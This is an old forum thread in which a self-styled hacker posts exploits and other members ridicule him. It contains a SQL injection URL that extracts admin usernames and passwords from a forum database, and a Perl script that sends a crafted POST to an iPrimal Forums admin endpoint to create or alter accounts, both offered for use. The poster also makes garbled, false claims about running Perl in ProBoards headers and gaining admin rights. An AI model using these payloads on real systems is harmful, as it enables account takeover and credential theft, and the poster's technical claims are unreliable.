One word: rofl.

lawl

So, out of curiosity, why all the syntax errors?

Because rofl, that's why.

You all don't know how to manage exploits the [/li][li] are important, simple javaScript is nothing compared to my work!! If you want more exploit here they go!

HEADER[/u]
http://[target]/[path]/forum.asp?H_ID=1%20union+select+0,0,ID,J_User,0,0,0,J_Pass,ID,0+from+adminlogins+where+ID=1&Name=Allm%E4nt


like many codes this one is a link (it leads to a malatious site do not click it)
The code above leads the injection for the code possible without trace, so you can accually post the exploit with an effect.

ALSO IN HEADER/b]
#!perl
#http://ipigroup.org/downloads/forums.zip
#Bl0od3r
#United States
#Whassup to all members of http://studiozero44.com/index.cgi
#special to chris
use IO::Socket;
if (@ARGV<4) {
&header;
} else { &start };

sub start() {
$host=$ARGV[0];
$path=$ARGV[1];
$user=$ARGV[2];
$passwd=$ARGV[3];
$post="usersname=".$user."&password=".$passwd."&email=test%40test.com&name=Dummy+user&tagline=Im+a+dumy+user&location=Ohio&bday=1983-11-20&job=Being+a+test+dummy&interests=Anything&bio=I%5C%5C%5C%27ve+been+sitting+on+this+db+my+whole+life.++HELP%21&signature=This+is+my+signature.&url=http%3A%2F%2Fipigroup.org&aim=myaim&yahoo=myyahoo&msn=mymsn%40hotmail.com&icq=546546&submitupdate=Update";
$len=length($post);
$sock=IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>"$host",PeerPort=>"80")
or die ("Error");
print $sock "POST ".$path."admin/index.php?p=members&edit=".$chris." HTTP/1.0\n";
print $sock "Host: ".$host."\n";
print $sock "Content-Type: application/x-www-form-urlencoded\n";
print $sock "Content-Length: ".$len."\n\n";
print $sock $post;

print "[+]Seems like your account has been created!Now try to login in :";
print "\n[+]User:$user\t[+]Password:$passwd";
}

sub header() {
print("
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
\t\t~~iPrimal Forums Users(ChangePass) 3xPl0!t~~
\t\t[+]By Mega-Ballin-Pimp-$ev
\t\t[+]A.K.A. $eve$hot
\t\t[+]A.K.A. lynxgawd
\t\t[+]Usage:script.pl owned.org /script/ admin yes
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
");
}

# metasploit.com [2007-05-31]

The top one will send a PM to the admion and change his password I edited it to send to "chris" this will grant full access to chris to the user, you can do this to anybody to check the passwords they entered

FOOTER[/u]
http://www.metasploit.com

w00t!!
PWNED!!!

and if you want more you can ttalk to me. I have also igured out how to screw over a proboards, you can add ?action=hack/headersandfooters andadd a code (I will not post it so, I cannot tell people how to hack this site) but you cannot write in the footers, you can copy/paste them without the code when you have posted the hidden code you can have full admin. And have privillages that the admin now doesen't even have........ yet.

Chris, PM me.

Anyway, what syntax errors where you reffering to???

The ones that were supposed to be in perl, not javascipt.

What are you all not getting? I know everything there is to know about that site!! Me adn Alex made it in '03!!

The proboards H/F Are not only JavaScript, but they are any type of script, if you would read the whole metasploit page you would understand the scripts.


Last Edit: Jun 3, 2007 2:07:06 GMT by H@kr 3XP|_0!tz

Yes, they're not only JavaScript, but you also can not execute Perl in headers/footers mate. I've tried quite a few times. ProBoards isn't 100% secure, but it also isn't vulnerable to something so easily executed.

lol, priceless

*chuckles*

This thread gave me a few laughs